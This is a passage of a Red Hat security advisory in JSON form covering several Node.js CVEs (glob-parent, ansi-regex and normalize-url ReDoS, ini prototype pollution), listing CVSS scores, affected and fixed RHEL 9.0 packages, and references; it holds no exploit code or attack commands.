"scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ini: Prototype pollution via malicious INI file" }, { "cve": "CVE-2020-28469", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-04-01T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1945459" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-glob-parent. The enclosure regex used to check for glob enclosures containing backslashes is vulnerable to Regular Expression Denial of Service attacks. This flaw allows an attacker to cause a denial of service if they can supply a malicious string to the glob-parent function. The highest threat from this vulnerability is to system availability.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-glob-parent: Regular expression denial of service", "title": "Vulnerability summary" }, { "category": "other", "text": "While some components do package a vulnerable version of glob-parent, access to them requires OpenShift OAuth credentials and hence have been marked with a Low impact. This applies to the following products:\n - OpenShift Container Platform (OCP)\n - OpenShift ServiceMesh (OSSM)\n - Red Hat Advanced Cluster Management for Kubernetes (RHACM)\n - OpenShift distributed tracing", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-28469" }, { "category": "external", "summary": "RHBZ#1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-28469", "url": "https://www.cve.org/CVERecord?id=CVE-2020-28469" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28469" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905", "url": "https://snyk.io/vuln/SNYK-JS-GLOBPARENT-1016905" } ], "release_date": "2021-01-12T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-glob-parent: Regular expression denial of service" }, { "cve": "CVE-2021-3807", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-17T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2007557" } ], "notes": [ { "category": "description", "text": "A regular expression denial of service (ReDoS) vulnerability was found in nodejs-ansi-regex. This could possibly cause an application using ansi-regex to use an excessive amount of CPU time when matching crafted ANSI escape codes.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes", "title": "Vulnerability summary" }, { "category": "other", "text": "This flaw requires crafted invalid ANSI escape codes in order to be exploited and only allows for denial of service of applications on the client side, hence the impact has been rated as Moderate.\n\nIn Red Hat Virtualization and Red Hat Quay some components use a vulnerable version of ansi-regex. However, all frontend code is executed on the client side. As the maximum impact of this vulnerability is denial of service in the client, the vulnerability is rated Moderate for those products.\n\nOpenShift Container Platform 4 (OCP) ships affected version of ansi-regex in the ose-metering-hadoop container, however the metering operator is deprecated since 4.6[1]. This issue is not currently planned to be addressed in future updates and hence hadoop container has been marked as \u0027will not fix\u0027.\n\nAdvanced Cluster Management for Kubernetes (RHACM) ships the affected version of ansi-regex in several containers, however the impact of this vulnerability is deemed low as it would result in an authenticated slowing down their own user interface. \n\n[1] https://docs.openshift.com/container-platform/4.6/metering/metering-about-metering.html", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-3807" }, { "category": "external", "summary": "RHBZ#2007557", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2007557" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-3807", "url": "https://www.cve.org/CVERecord?id=CVE-2021-3807" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3807" }, { "category": "external", "summary": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994", "url": "https://huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994" } ], "release_date": "2021-09-17T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2022-09-20T12:27:54+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2022:6595" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "products": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes" }, { "cve": "CVE-2021-33502", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-05-24T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:npm-1:8.11.0-1.16.16.0.1.el9_0.x86_64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1964461" } ], "notes": [ { "category": "description", "text": "A flaw was found in normalize-url. Node.js has a ReDoS (regular expression denial of service) issue because it has exponential performance for data.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-normalize-url: ReDoS for data URLs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-nodemon-0:2.0.19-1.el9_0.src" ], "known_not_affected": [ "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.src", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debuginfo-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-debugsource-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-docs-1:16.16.0-1.el9_0.noarch", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.s390x", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-full-i18n-1:16.16.0-1.el9_0.x86_64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.aarch64", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.i686", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.ppc64le", "AppStream-9.0.0.Z.MAIN.EUS:nodejs-libs-1:16.16.0-1.el9_0.s390x", 